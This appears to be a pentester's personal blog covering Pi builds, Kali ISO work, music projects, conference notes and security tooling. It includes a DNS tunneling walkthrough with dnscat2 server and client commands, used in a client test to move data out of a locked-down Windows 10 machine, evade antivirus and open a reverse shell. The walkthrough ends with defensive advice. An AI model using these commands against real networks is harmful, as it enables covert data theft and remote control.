Projects to-do

Pi Bakery - standardized build for default PIs on home network

Pi build instructions for full-on wifi testing tool, including a reproducible build of my current hacking box.



Pi dropbox for 802.1x NAC bypass
Pi dropbox for ssh outbound access

Twitter bot on Pi - ideally one that will receive requests from only me to download specific youtube URLs to the Plex bot, from anywhere. So that I can immediately download music to my Plex server at home.

OpenVAS docker image. Or Bloodhound+Neo4j on docker image.

Learn/play with Kubernetes, Terraform.

Hashcat script - hashcat post.

Re-install everything on my other laptop.

Pi Bakery

As you can see, my posting rate has dramatically dropped off. Part of this is because of a general disenchantment with doing limited-scope pentests against which networks are increasingly protected. What's the point, say I, of doing a pentest that doesn't permit access to physical workstations or emailing/phishing as part of the assessment? What benefit does a company receive of sitting me down at a network port, me failing to get on due to NAC, or even if I do get on, finding that everything is locked down and random ports aren't open, other than being able to check-off that they've done their yearly pentest?

In one (or rarely two) week, how do you expect me to assess anything else other than a point-in-time assessment? Am I testing how you look right now? or do you rather care what happens over time? Will someone slip up? Are effective policies and training in place to prevent mistakes?

Even worse are tests of targets directly, without permitting access to the network on which they sit. The only entry of attack is finding, or more likely writing, exploits of minor items and chaining them up. In which case you're only proving why something that the company considers only a medium risk, should be elevated higher and fixed. What a load of wasted effort.

Now, since it was pentests that made me do side research, not doing pentests naturally led to flagging research. Other events aside, lead me to understand that relying on work to make me happy or to drive side research and learning, is not the right path. So now I'm working on separating work and hobbies, general self-improvement, etc, and learning some new things.

Recently I found out the power of a Docker container running OpenVAS, which was super easy to install and run on Kali Linux without having to worry about dependencies. Afterwards I read "The Phoenix Project" and am almost done with the book on which the former was based, namely "The Goal". I've also started reading the DevOps Handbook to get a better grasp on SecDevOps and how to manage/drive change in an organization.

Today I've spent most of a day playing with Pi Bakery to create a standardized Pi image install. Pretty darn useful.

The plan is to eventually create an RPi dropbox for pentests, much later down the line, which should be able to do wifi stuff and/or bypass 802.1x network access level protections.

Update: Here is a standard Pi Bakery recipe in case you want to play with it. It performs the following actions:

1. Add noatime to all the partitions in /etc/fstab to avoid writing to SD Card (prolongs life of SD card)
2. apt-get update
3. install nmap git screen irssi dnsutils vnstat cifsutils
4. remove swap - also prolongs life of card
5. adds one alias command to ~/.bashrc
6. changes timezone to Central
7. Generates locales to US UTF-8 like raspi-config does
8. reboots.

Password will be raspberry123, make sure to change it, and also do a full upgrade

UPDATE 2: Item 7 above is not working, still working out hijinks.

Live Build a Custom Kali ISO

During May and June of 2018, I worked on a really difficult project, namely attempting to create a custom Kali Linux ISO for unattended installation (and Live if necessary). While strictly speaking this is a work-related project, the paucity of working, current guides on the internet lead me to believe that people will benefit from a full run-down of how I got an unattended install to work.

Please note - This is a work in progress. As such, there's a lot of things commented out or left in because I worked on an incremental basis. Since this project was several months ago, some of the detailed explanations are unlikely to be completed.


Prelude: I was tasked with creating a custom ISO build of Kali Linux, such that it can be installed on a laptop (presumably using a live USB), or installed on a Virtual Machine. The idea is that you plug in the USB and boot from it, select “Automated Install” for instance, and have a complete install be performed on your behalf with the least amount of interaction possible.

I was directed to a link such as this one: https://docs.kali.org/development/live-build-a-custom-kali-iso. As you can see, a custom script and folder structure can be obtained for a live build from git://git.kali.org/live-build-config.git. It’s based on Debian’s own Live Build command, but makes things comparatively simpler for the end-user, e.g. all you, the user, needs to do is run “./build.sh –verbose”.

However, all of the documentation I found on using the Kali Live Build script was outdated, incomplete, or simply wrong, and wasted many hours of my time. Most of Debian’s documentation is only helpful for minutiae.
Examples:
https://docs.kali.org/development/live-build-a-custom-kali-iso - Cursory information, no details
https://docs.kali.org/kali-dojo/02-mastering-live-build - the one line about adding a preseed file to an arbitrary “debian-installer” folder that is not used anywhere within the build script threw me way off. Even if you follow this guide you won’t get a working unattended install.
https://www.offensive-security.com/kali-linux/kali-rolling-iso-of-doom/ - the preseed has errors and will not perform an unattended install.
https://kali.training/topic/building-custom-kali-live-iso-images/ - Most useful, but still not enough information about how to create a valid preseed file or what live build hooks really do.

So, through many hours of trial and error, I came up with a build process that reliably works for VMware. This may not work for Virtualbox.

Google Docs Link here

Maybe later I will upload a ready-to-go live build version to my site and provide a link.

Warning: Politics

Thanks, former colleague and friend on Facebook, you say it better than I've heard in a while:

and I had a long talk last night where I brought evidence to many claims he made. When presented with facts, he demanded respect for his system of beliefs in exchange for him respecting mine. Although I appreciate the sentiment, this isn't a give and take for me. This conversation made me lose all respect for this former friend, and I do not wish to surround myself with people of his system of belief. This is deeper than politics, it's about what you stand for. If you idolize someone that is a collective symbol of hatred, racism, misogyny, anti-intellectualism, cowardice, extreme hubris, there is no room for you in my life and I'm drawing the line there. I don't care if you're a democrat, republican, conservative, liberal, identify as an asexual dial up modem internet connected toaster, or(in this case) if we were childhood/highschool/college friends. If you reject facts and evidence, it's time for the story of our connection to come to an end. I'm proud to be a Texan and proud be an example that not all of us are the stereotypical dimwitted racist simpletons that are too often propagated in the news to the rest of the world.

Back to basics

For some time I've felt the need to review my information gathering and discovery skills. With many IT shops now doing regular vulnerability scanning, it's a lot harder to use Nessus as a jumping off point for a (glorified) pentest. Instead I'd prefer to use other things, surreptitious port scans, network-related vulnerabilities, even printer exploitation. The latter is an area I'd long avoided as hitting printers could cause DoS conditions, but am learning more about as of late.

One good thing might be to finally go through the list of Kali Linux tools and try each one out during a pentest. This would be hands-on-keyboard experience and would be very useful. Sometimes I browse a bit and quickly discovery items that could be handy.

Jews being too damn frum

https://www.israelnationalnews.com/News/News.aspx/248113

Raga time-of-day player - long term project

SqueezeLite/SqueezePlay

https://discourse.mopidy.com/t/playing-schedule-for-pi-muscbox/1107

https://docs.mopidy.com/en/latest/ext/local/

http://www.gerrelt.nl/RaspberryPi/wordpress/tutorial-installing-squeezelite-player-on-raspbian/


http://www.parrikar.org/

http://raspberry-at-home.com/logitech-media-server/



I compiled these links back in November of 2017. Since approximately a year ago I'd had the idea of creating a raga time-of-day player with a Raspberry Pi Zero.

The original idea was to have some sort of set-up, similar to Plex Media Server, where if you visit a URL music will be playing automatically (like a radio station) with a selection of Hindustani ragas appropriate for the specific time of day.

After spending a couple of days struggling with the software implementation, using Mopidy or Squeezelite or Icecast, I realized that it's a lot harder than it looks. With time, the idea evolved to a focus on actually learning basic theory for Hindustani Classical Music. That's a good starting point and one I'm currently slowly pursuing.

Here's the project broken down into parts:

1. Hardware - Raspberry Pi Zero with youtube-dl to download music, and a 128 GB micro-SD Card.
2. Software - Pi MusicBox, mopidy, Icecast, Plex, SqueezeLite, all are options.
3. Scripts. Either:

• Create a script to generate playlists with an approximate run-time of 24 hours, by selecting mp3 files from appropriate directories and creating m3u playlists from these
• can be shorter than 24 hours as I'm unlikely to be listening to raga music in the 4th prahar of the night (3 AM to 6 AM)
• Set up an actual radio station
• Import filenames into a SQLlite database to help with song selection?
• Find software that can recognize length in time of tracks

4. Play music according to the right time. One system for classifying ragas (other two are scales and raga/ragini) involves playing them at the right time of day/night/season.
5. Collect music tracks from youtube and categorize them appropriately, or create a script that searches the filename and categorizes them automatically according to some rules, or adds id3 tags accordingly...
6. Learn the theory so you can actually know what's going on. This is actually rather difficult, as there's a lot of terminology and lots of variation between schools of playing. In fact, even the time classification underpinning this project is subject to differences of opinion. For instance, Raga Shree is classified as either an evening raga or a raga of the 4th section of the day (prahar - 3 PM to 6 PM), but is traditionally played at sunset, which is either in the 4th prahar or the late part of the 5th prahar depending on the time of year and DST.


So you see there's a lot of moving parts. 

Toorcamp reflections

Leaving Toorcamp, I felt conflicting emotions. These developed further after some thoughts and while compiling the Toorcamp presentations.

1. I could have spent more time getting to know the people at my campsite (Camp for Misfit Toys). It was a last-minute campsite for people who didn't know anyone else, who most frequently were at their first Toorcamp. And they were all interesting and unique people. However, in my rush to see everything at Toorcamp I didn't get to know them well.

2. Last Toorcamp I focused on talking to many people (without personal projects to work on). I remembered only a few after the camp was over. This time I focused on personal projects, like soldering a TV-B-Gone, and trying some other things, and less on talking to people. While these are different approaches, what's left with me after Toorcamp is mostly what I learned from talking to other people, such as what projects they were working on (related notes and keywords of which I saved on my phone for later). This is probably the most useful.

3. I spent too much time more drunk than preferred. Several of my phone notes are from times I don't remember from some sort of combination of cider (cider lovers rejoiced at the grocery in Eastsound due to its flabbergasting collection of the stuff) and other beers (but I can't deny that Pike Monk's Uncle Tripel Ale (purple can) was fantastic and enhanced the experience). I feel like I lost the chance to connect with people more deeply due to being forgetful while tipsy.

On the plus side the lighting effects the Toorcamp team placed to light up the night sky and dark trees were gorgeous and once brought me vividly back to the pine trees of Rome.

Courtesy of @macklikeaduck

As in the resolutions in the 2016 presentation, here are some new ones for the next two years (and my phone notes):

1. Really start soldering. I'll get a desk, a soldering iron, a fume extractor, and a workspace to hold components, and finally start soldering kits and learn how to use a breadboard and wires.
2. Actually take the radio ham exam. Tried the week after Toorcamp but the contact was not amenable so I'll set up to take it elsewhere. June 2018 was the last month before a different version of the exam comes into use, so I'll study that guide instead.
3. Hardware hacking?
4. Cyberchef
5. DeviantOllam's CarolinaCon talk about Liquor
6. DJ lobsterdust
7. Jim's famous hackerbourbon list
8. Johann Sebastian Joust (kinda stupid though)
9. Milky Tracker, protracker for amiga (tried but failed, now to get a VM of an amiga)
10. NodeMCU esp-12e module
11. Security+
12. Quantize playing (?)
13. Script to automate getting a ticket on Orcas Island Ferry website. Check for tickets not open for reservation vs yes (this one came to me while pretty high).
14. Strapbook
15. Trash-grass
16. Play with WS2812B LED individually-addressable strips.

Resolutions for Toorcamp 2020 (if I wind up going):

1. This time, actually take a car, by ferry, to the island. It makes life a lot more convenient. For instance, with a rental car I won't need to waste most of an afternoon hitchhiking to the grocery to pick up victuals.
2. Come with a girlfriend or wife? Anything can happen in 2 years... :)

Mount a remote directory using sshfs

How did I not know about this all this time???

https://debmintux.wordpress.com/2010/04/25/mount-a-remote-directory-with-sshfs/

Now I can do music file management via a graphical interface versus cp / mv in command line.

Post-Toorcamp Presentation (2018)

As in 2016, I've created a presentation that makes an attempt at capturing the magic of Toorcamp with slides and pictures of everything I saw (and missed) at Toorcamp. Although this powerpoint was originally created with embedded videos, these ballooned the size to nearly half a GB, so there will be two presentations - one with videos, and one without 'em.

Unlike in 2016, this one will not be on Slideshare as pictures were used mostly without attribution.

If attribution is requested, attribution will be added.

Slides here without video

Update: Slides with video, as presented at HAHA

Post Toorcamp packing analysis

Got back from Toorcamp yesterday. It was certainly interesting. This year I focused on making things (soldering for instance), so there was less opportunity to meet new people.

Here's a quick brain dump mostly for me on what was useful to pack and what was not. Once again, there was a cold night (Saturday) when the temperature dropped to 48 degrees F, and I wasn't quite ready for that.

Scarf: Made life much more bearable. Probably the single one thing that really made everything much better. I wore it all the time except sleep and about 11 to 4 PM.

REI shirts from my Europe and Italy trips: Great as before, no sweating.

All my Raspberry Pi Projects: Didn't even touch them. There's just too much to do and see at Toorcamp.

A gaggle of cables and 10/100 5-port switch: Unnecessary.

Rope: No trees, not useful for keeping animals away.

Scent-proof Ziploc bags: Much more useful, no animal issues (unlike the tent next door, used to store food, which was torn apart at odd hours of the night by a large racoon).

LUCI lights: Lux variety much better than the clear ones. Fantastic for ambient lighting on a table with a group of people, which was my situation. 

Solar-powered LED lights: Wonderful. I didn't realize till after receiving it that it was 66 feet long. This was enough to cover a 10x10 canopy all around plus extra, and it stayed on for hours. Several people commented on how nice it was.

Spare disposable batteries: Not necessary.

SDR and antenna: didn't get to use it, probably not necessary.

Poncho: Used once, maybe an umbrella would make more sense.

Sweater purchased in Prague: Very useful.

All the extension cords: Yes.

Reusable shopping bag: Definitely useful. Too bad I didn't get to drink all the cider I bought.

Instant Oatmeal, many tea bags, kosher beef jerky, instant potatoes, challah bread: Eh.... The challah bread went stale, the kitchen was too far away for tea, and the rest wasn't really necessary since I hitchhiked to the store on the island and picked up more than enough canned food.

On that note, curried lentil canned soup: Absolutely not a good idea in a camping situation. Contrary to traveling for work when occasionally limited food situations can arise, extra fiber isn't good when 500 other people need to use a limited number of restrooms on a continual basis (especially if a nearby campsite decides to have free bar evenings from 8 PM until "the lights are turned off").

Shabbos goy shirt: Limited value this time.

For next time:

Sunscreen: Although I'd packed it, I was afraid of running out, to no need. It would have been smart to bring maybe an extra tube, as everyone got burned the first day. For me, badly burned on my nose.

Piratebox: bigger capacity, enable upload functionality. I substituted with an AC750 travel router or portable external drive instead.

Car: Driving to camp will make life much easier, plus I can clean up if needed.

Blackhat Talks to look forward to

The schedule for Blackhat 18 talks has been released here: https://www.blackhat.com/us-18/briefings.html

Looking forward to the following:

A Dive in to Hyper-V Architecture & Vulnerabilities (Could be useful, VMs are everywhere)
AI & ML in Cyber Security - Why Algorithms are Dangerous
An Attacker Looks at Docker: Approaching Multi-Container Applications
Applied Self-Driving Car Security (the original car hackers strike back)
Are You Trading Stocks Securely? Exposing Security Flaws in Trading Technologies
Automated Discovery of Deserialization Gadget Chains (making deserialization vulnerability exploitation easier? yes please)
Blockchain Autopsies - Analyzing Ethereum Smart Contract Deaths (I like sci-fi)
Breaking the IIoT: Hacking industrial Control Gateways
Catch me Yes we can! – Pwning Social Engineers using Natural Language Processing Techniques in Real-Time
Deep Neural Networks for Hackers: Methods Applications and Open Source Tools
Don't @ Me: Hunting Twitter Bots at Scale
Edge Side Include Injection: Abusing Caching Servers into SSRF and Transparent Session Hijacking
Exposing the Bait: A Qualitative Look at the Impact of Autonomous Peer Communication to Enhance Organizational Phishing Detection
For the Love of Money: Finding and Exploiting Vulnerabilities in Mobile Point of Sales Systems
From Bot to Robot: How Abilities and Law Change with Physicality
From Workstation to Domain Admin: Why Secure Administration isn't Secure and How to Fix it
Identity Theft: Attacks on SSO Systems
Is the Mafia Taking Over Cybercrime? (tie into the recently-released Web of Profit study)
Last Call for SATCOM Security (see this article for a preview)
Meltdown: Basics Details Consequences
Open Sesame: Picking Locks with Cortana
Outsmarting the Smart City
Over-the-Air: How we Remotely Compromised the Gateway BCM and Autopilot ECUs of Tesla Cars
Practical Web Cache Poisoning: Redefining 'Unexploitable' (from Burp Suite extraordinaire himself)
Screaming Channels: Extracting Bluetooth and WiFi Keys from Radio Noise
SirenJack: Cracking a 'Secure' Emergency Warning Siren System
So I became a Domain Controller (from authors of mimikatz)
The Air-Gap Jumpers
The Science of Hiring and Retaining Female Cybersecurity Engineers
The Unbearable Lightness of BMC's
The Windows Notification Facility: Peeling the Onion of the Most Undocumented Kernel Attack Surface Yet
TRITON: How it Disrupted Safety Systems and Changed the Threat Landscape of Industrial Control Systems Forever (I read the PDF but having it explained would be great)

 

Parsing .Nessus files - Part 3-ish

Today I'm finally getting around to re-packaging Melcara's script to include the latest version released in September 2017. I'll also need to make the new changes to the perl script (which I foolishly did not save from prior changes).

So:

cpan install XML:TreePP Data::Dumper Math::Round Excel::Writer::XLSX Excel::Writer::XLSX::Chart Data::Table Getopt::Std Net::IP pp

Perl file changes (changed here, can be used to generate report in linux assuming you have all the right libraries):

1. Include "use Net::IP;" at top.
2. Re-order sections to write excel sheets at bottom to "Summary", Criticals, Highs, Mediums, Lows, Informational, Vulnerability to IP Summary.
3. Add block to sort IPs in that last sheet before writing them out.

Install Strawberry Perl Portable in Windows, then through trial-and-error install the modules needed to get pp to work. Pray that something works. But it never did and I gave up after six hours of frustration.

pp -M JSON -M PAR::Dist -M URI::Escape -M LWP::UserAgent -M HTTP::Cookies -M Data::Dump -M Data::Dumper -M XML::Hash::XS -M XML::TreePP -M MIME::Base64 -M Math::Round -M Excel::Writer::XLSX  -M Excel::Writer::XLSX::Chart -M Excel::Writer::XLSX::Chart::Pie -M Data::Table -M Getopt::Std Net::IP parse_nessus_xml.v24.pl

Note: some of these libraries may not be needed anymore but it worked last time and extra bits don't hurt in this case.

Dpkg::Options note

When installing linux upgrades check this page for references on how to let apt upgrade do its own thing with new/old/updated configuration files:

https://raphaelhertzog.com/2010/09/21/debian-conffile-configuration-file-managed-by-dpkg/

Quick review of Alfa AWUS036AC (or AC1200?)

Some time in March I read this article which has a great run-down on the state of 5 ghz packet injection in Kali Linux and the most capable wireless cards. I got all excited and attempting ed to order the AC1200 without carefully examining the provider. Instead I got the device pictured on Amazon but it says AWUS036AC on the back.

Oh well. Driver support out of the box is flaky and airmon-ng doesn't play well with it even with the proper drivers installed.

 apt install dkms realtek-rtl88xxau-dkms  

Then, to put the card into monitor mode, perform the following set of commands each time:

 ip link set wlan1 down  
 iw dev wlan1 set type monitor  
 ip link set wlan1 up  

To take it out of monitor mode (very important) before unplugging:

 ip link set wlan1 down  
 iw dev wlan1 set type managed  
 ip link set wlan1 up  

So those are the cons.

Pros: Great reception of nearby access points. Where before I could barely manage 56 for the closest APs, now it shows as mid-30s. This makes capturing handshakes potentially much easier. As it is, most likely that's what I'll use this device for.

CISSP Training

I'm at a company event doing CISSP training, ready to bite the bullet and schedule the exam in June, either before or after Toorcamp. Currently we're going over a somewhat familiar domain involing cryptography, so I'm reading a lot of Feedly and tweets using Tweetdeck.

https://khanism.org/society/how-social-media-destroyed-my-generation/

Not terribly convinced by this post's hyperbole; to be fair the author isn't so sure himself anymore.

https://www.npr.org/sections/thetwo-way/2018/05/01/607054795/nra-bans-guns-during-convention-speech-by-president-vice-president

This is literally a non-issue. The President and Vice President are speaking, the last thing the Secret Service wants is guns not in their hands in the same room or hall as the colloquial "45" and Co. I might dislike Trump intensely but still understand that security protocols have to be followed everywhere, regardless of the supporting stance of the organization under whose auspices they are there. If they were talking at a pen-knife convention would people be up in arms if pocket-knives were banned? Maybe if pocket-knives were used as weapons of mass destruction and killings? Something smells fishy.

Getting Burp interception to work in Android Nougat - April 2018

Apparently, it's gotten much harder to intercept mobile app traffic with Burp since my last work a year ago, so guides like this one from Portswigger no longer work. This is detailed in a great guide here:

https://blog.ropnop.com/configuring-burp-suite-with-android-nougat/

"Starting with Nougat, Android changed the default behavior of trusting user installed certificates. It's no longer possible to just install the Burp CA from the sdcard to start intercepting app traffic. Unless otherwise specified, apps will now only trust system level CAs. The failure happens "invisibly" and is responsible for all the alerts I saw in Burp Suite."

I followed the guide in this article (using a Windows 7 machine), choosing to unpack the apk with apktool as my new Pixel 2 is not rooted, but ran into a bunch of issues:

1. To unpack the apk tool required using an older version of apktool (2.2.2).
2. To re-pack the apk tool required using the latest version of apktool (2.3.1 at the time of this writing) but first following the procedure outlined in this bug report (running apktool empty-framework-dir)
3. Installing OpenJDK 8 to get keytool.exe and jarsigner.exe.
4. Opening the Command Line Interface (cmd) as administrator to run the jarsigner tool.
5. Install AndroZip on the phone to access the destination folder for the new apk file and install it from there, to get the prompt to install untrusted apps.


Another resource: https://serializethoughts.com/2016/09/10/905/

Update 5-1: This wound up not working for the app I was using. Instead I used an app called Packet Capture to look at the packets on the phone directly.

Hashcat GPU benchmarks

Tired of incessant Googling for the same benchmarks, I compiled a spreadsheet of benchmarks (various versions of Hashcat) for Nvidia's GTX 9xx and 10xx series of GPUs.

Note that Hashcat versions 3.20 and later are generally much better than previous versions. Some of the benchmarks I found for older cards were for those older versions, and the results might be higher with newer versions of Hashcat.

Random thoughts

I've somewhat soured with time on Twitter as a platform for thoughts/tweets. This Twitter thread is a good example of how not to provide interesting information in article form:

• Unnecessary background of Twitter user's profile
• Lede with bigger font
• Distracting retweets and likes after each 240-character text block
• Way too much extra stuff for each comment (actual comment text highlighted).

 If you want to have photographs along with itty bitty blurbs of your subject, then use an appropriate format: e.g. EnglishRussia or LiveJournal travelogues.


*******************************

The whole discussion about UBI is useful, but (without any sources) I wonder why the argument "people will have more time to focus on their passions" is frequently trotted out. I think it's fair to say that most people aren't terribly self-propelled and might just vegetate all day in front of the TV or play computer games forever. Of course new jobs might be developed to help manage the hosts of issues that crop up when you sit all day, but is that something we will have to acknowledge when it happens.


******************************

The Facebook thing going on brings to mind again how easy it is to exploit the vast quantity of information to be evil, so much that I'm surprised it doesn't happen more frequently. Perhaps it's because Opsec is hard, or because the thinking is easy but implementation is harder. So many people don't use ad blockers, or go through life with low IQ or lack of critical thinking skills to identify when they are being duped, or give apps any permissions necessary. Non-compliance with the law is not an issue if you don't get caught, and aside from getting prosecuted on an individual scale, lawsuits against companies take so long that you can continue predatory practices so long as a ruling hasn't happened.

Once you dispel the notion that a product has to follow all the rules of government regulations, ethics, normal human politeness, etc, then it's very easy to decide to exploit human weaknesses for your own purposes, whether it be marketing, advertisement, or whatever (see social engineering and OSINT). 

“If you know the personality of the people you’re you’re

targeting, you can nuance your messaging to resonate

more effectively with those key audience groups”

—

Alexander Nix, Cambridge

Analytica"

So strictly speaking CA did nothing wrong. Who knew that it would take the election of the wrong person for the media to notice it? CA is the logical conclusion of the ability to weaponize ubiquitous ad networks, coupled with Facebook's targeted advertising, and probably a bit of de-anonymizing as well.

***********************************

With all the reading I'm doing thanks to the plane's holding pattern, I'm getting lots of new thoughts. Currently musing while reading this interesting presentation from Defcon 25 (August 2017) about weaponizing ads and propaganda. If politics / targeted advertising / Facebook / all that is so bad, wrecks your ability to do math (see here, page 14, Discussion section), then why not disengage? You'll only wind up smarter than everyone who engages, and possibly more employable in the near future when the unholy combination of gig economies, loss of welfare programs, wealth inequality, long squeeze of climate change, and pending automation via neural networks, all combine to make a lot of people become unemployable.

DNS Tunneling walk-through

DNS is a rather complicated system to resolve IP addresses into human readable words and vice versa. There's any number of guides online for understanding and implementing DNS, but the average user will only see it in the following form:

The reason DNS is actually quite complicated can be figured out from the Wikipedia article linked above, or by looking at the steps involved above. That's a lot of hops and different potential computers to query just to get to google.com. In fact, before step 3 above there can be another step if your computer is in a complicated network, such as at a corporate office location, where a local DNS server is queried first before going out onto the web:

Please read the following presentation I found, especially on slide 11 which illustrates the arrows in the image above.

It helped me to think of DNS as parts of a system rather than a whole, e.g. it's a "decentralized naming system for computers, services, or other resources connected to the Internet or a private network". To help make the Internet work, various "authoritative" servers have some version of this naming system installed, and respond to DNS "queries" to translate websites names to IP addresses for your web browser to understand. Since it's just a naming system, there's any number of DNS programs, and even your own computer can function as part of this, such as being a local DNS server.

Here's a query we can go over from my home network, which isn't a perfect environment as a recent network/router upgrade plus use of a secondary DNS server has created hard to figure out DNS issues. We're going to use the "nslookup" tool to resolve "www.yosefkerzner.com".



Now, because I like to get to the deep levels of who things work, let's start from the top, or bottom as it were.

1. The computer issuing the request has received a local IP of 192.168.3.107 from the router via DHCP. DHCP is a way of handing out IP addresses dynamically.

 Along with this IP, the router told the computer to use 192.168.3.102 as the local DNS server. This IP address, with a hostname of pihole, hosts just that, the Pi-Hole network ad blocker. Along with interesting ad-blocking effects, websites can load faster thanks to some extra caching. So the nslookup tool first outputs just that information.

Then a DNS query is issued to the Pi-Hole:





Next, the pihole refers to the "upstream" DNS settings in its configuration, and finds that the upstream DNS settings have the Google DNS servers of 8.8.8.8 and 8.8.4.4. For some reason two DNS queries for the A record are made (this is strange and I don't know why it happens):

While looking for the A resource record, the Google DNS server discovers a CNAME resource record saying that "www.yosefkerzner.com" is an alias for "yosefkerzner.com", so it re-initiates the query using "yosefkerzner.com".  It finds an A record for "yosefkerzner.com" with the matching IP address of 75.98.175.85, and returns that information to the pihole.

This then gets passed back to the original computer:




I'm not getting into existing NS records for this domain and what role they play in the resolving process, and also not discussing resolving 75.98.175.85 (reverse-dns), as this currently isn't working for a reason I'll have to investigate, but probably has to do with the domain being hosted on A2Hosting, not a standalone server.

Now, after this sidetracking, we can get back to the main topic. If you've read some of the links, you'll see that there's a whole number of resource records that can be configured for DNS, including a TXT record, which permits you to add arbitrary information about a domain. This can be useful in situations where regular browsing over HTTP isn't working, whether because you have to pay Delta a ton of money to browse their inflight-wifi, or pay a hotel to use the wifi, or because a pesky network administrator has blocked all outbound HTTP communication and isn't monitoring DNS. Why not use the TXT records to hold other types of data and make a data tunnel with DNS?

Enter DNS tunneling. Guides are available everywhere, here's the best image I've found:

Me and some colleagues used DNS tunneling to prove it was possible to send data from a locked-down Windows 10 machine meant for a secure environment outbound to a server under my control. I followed this guide: https://zeltser.com/c2-dns-tunneling/ mostly, but used a rewrite of the DnsCat2 tool created by the folks at BlackHillsInfosec for Powershell, dnscat2-powershell, as the original client executable was flagged by antivirus and immediately removed.

The domain I used was "yosefkerzner.com", and in A2Hosting the settings were set as follows:

1. Visit https://my.a2hosting.com/clientarea.php?action=domaindetails
2. Click the entry that says "Private Nameservers". Register a NameServer Name. In my case it was dns1.yosefkerzner.com. Enter the IP address of the droplet created during the guide above, and click "Save Changes". Create another one for dns2.
3. Now, click the section titled "Nameservers". Click "Use Custom Nameservers" and enter your private nameservers, e.g. dns1.yosefkerzner.com and dns2.yosefkerzner.com.
4. Click "Change Nameservers" and wait 24-48 hours as the nameserver information gets propagated across the web. Watch whatever content hosted originally on your domain disappear.

 I encountered the following issues with Dnscat2:

• The tunnel created was highly unstable.
• It did not tolerate being idle, as eventually DNS queries would get jumbled up and the tunnel would break, so eventually I simply launched long queries such as a dump of running processes to keep the tunnel alive while researching what else could be exfiltrated.
• I was forced to launch a connection first, and only then to drop into a reverse shell. Command shells didn't work at all, though console connections did if I wanted to type text in the client and see it on the server.
• Security tunnel options included in the tool also caused instability, so I had to operate it without security or secret passphrases, e.g.:
• On the server: ruby ./dnscat2.rb --security=open --no-cache --dns="domain=yosefkerzner.com"
• On the client: Start-Dnscat2 -Domain yosefkerzner.com -NoEncryption
• Uploading and Downloading didn't work at all, even for small files.

All in all it was a fun experience and great proof of concept of the importance of security controls for DNS. To prevent DNS tunneling consider limiting outbound DNS or using DNSSEC, and monitoring for large DNS volumes, because no client needs to be sending vast quantities of DNS queries to a unknown IP address.

Reading fun stuff

Thanks to a fortunate stroke of luck, I'm in another city in a holding pattern, waiting on a client to give me (us) work to do. In the meantime there's stuff to read and news inputs to improve, e.g. TweetDeck - now it's all pretty and Twitter is usable for information again.

https://arxiv.org/pdf/1803.03453v1.pdf - my favorite video from this paper is the following: Evolving Soft Robots with Multiple Materials

Was also sent this article about Getting up to Speed with Ethereum, and indeed it's quite the crash course. Currently I'm bogged down in Ethereum DNS equivalent proposal and envisioning alternate browsers. Oh wait there already is one, kinda, called Mist

After the Ethereum crash course I plan to read through the resources on this Technet article about Active Directory and only then start creating an Active Directory lab.

With all this spare time, I'm also making improvements to music downloading scripts and other random stuff. For instance, yesterday afternoon was spent in a frustrating attempt to get the Pineapple Nano "Portal Auth" and "Captive Portal" modules to work, but no matter what I do, cloning websites just doesn't work. The nano's native ASH shell doesn't help either. I'll keep at it but at some point it will be easier to just host my own web server, with a copy of the login portal, then host the portal somehow and overpower nearby broadcast APs with my signal.

In other news, I'd installed a new Graylog VM to take Nzyme inputs on a system with more resources. It worked fine for a few days while connected to the homelab, but apparently on VPN it can't take the same input... which makes sense given that it's got the NAT'ed address. What's worse, even on NAT the web interface fails to load completely all while the CPU usage is completely maxed. So that's another thing to hunt down, because I'd like to gather 10-20 GB worth of data to mess with yet some other time.

Projects Update

I think I'll start posting these sorts of updates regularly, not least as a way of keeping track for myself (brain dump hehe).

Ever since Italy, and even before that, I've been in a bit of a funk, still interested in infosec but wishing for something else. This probably isn't related to work, but for now it might be due to stagnation of new ideas/areas. Maybe it would make sense to study at coffee places (can't say coffeeshop after Amsterdam) in more social environments.

Anyway, here's a list of pending projects:

• Still need to setup Active Directory
• Still need to setup the wireless lab environment for the Defcon Enterprise Wifi hacking lab
• Still need to set up the raspberry pi to stream ragas
• Streamline password-cracking process using a new GTX 970 combined with WakeOnLan
• This will include hashcat wordlists plus rules
• Read all the books, and especially Network+ for more ideas
• Sit down and think of the best form factor for an always-on VM machine. As much as the current machine (which is a trash save, having previously been one of my dad's PCs) works, it's still 9 years old, dual core, max 8 GB DR2 non-ECC ram, with a 160 GB spinny and as I discovered yesterday simply can't handle newer operating systems such as an always-available Kali Linux system. Intel NUCs look nice, though I'd like the lowest decibel operating noise level possible. Maybe I'll upgrade the current box instead.
• Try implementing an SSO solution for the homelab. With just a few certificates for VPN I can already foresee certificate management being a nightmare, let alone implementing SSH certificates everywhere. 
• Try implementing a vulnerability management program. For some reason, identical versions of Raspbian can have different outdated versions of Apache even when fully upgraded - so how are these prioritized?
• Try again to get ICMP ping to work within the LAN.
• Track down pesky Plex issues. 

I'll post more items later.

More fun with Downloading Youtube Videos - old post October 2017

If you use youtube-dl to download playlists, the download speed will often slow to a crawl. You can get around that with two methods, 1) keep the terminal where the script is running open, or 2) issue the command using the screen tool, e.g. "screen sudo youtube-dl , then just pressing Ctrl-A-D, closing the window (Putty), and going about your merry way. 

Website temporarily down

www.yosefkerzner.com is temporarily offline due to being used in a DNS tunneling test. The test was successful and I will eventually post about it.

As such, I can't share a script written today for removing duplicates from wordlists for hashcat.

1.  awk '!seen[$0]++' filename is nice and all, but it uses all the RAM available and slows down considerably once a file is more than 600 MB, and basically never finishes after that point.

2. sort -u -o uses 60% of available RAM and all CPUs, and takes possibly three times as long as option 1.

I wrote a script to split the input file into 160-megabyte pieces, which seems like a good best-speed size and limits RAM usage to under 3 GB per sorting. Option 1 command is then run on each piece, then they get concatenated back into a single large file.

First benchmarks (i5 2310):

On a 3.5 GB wordlist (which was already deduplicated mind you), the script took 7.15 minutes to complete.

On an 8.3 GB wordlist (mostly deduplicated), the script took 19.5 minutes to complete.

Deduping rockyou.txt takes 18 seconds.

Update: Site's back up, here's the script.

Script to download daily Performance Today episodes

Call it whatever, such as pt.sh, and put it in cron as follows:

 $  
 0 9  * * 1-6 root  /home/pi/Programs/pt.sh  

 #!/bin/bash  
 # Hour 1  
 wget -P /mnt/usb/Music/Radio/Performance_Today/ \  
 "download.publicradio.org/performance_today/`date +%Y/%m/%d`/pt1_`date +%Y%m%d`_128.mp3"  
 # Hour 2  
 wget -P /mnt/usb/Music/Radio/Performance_Today/ \  
 "download.publicradio.org/performance_today/`date +%Y/%m/%d`/pt2_`date +%Y%m%d`_128.mp3"  

Silent new feature in Firefox - First Party Isolation

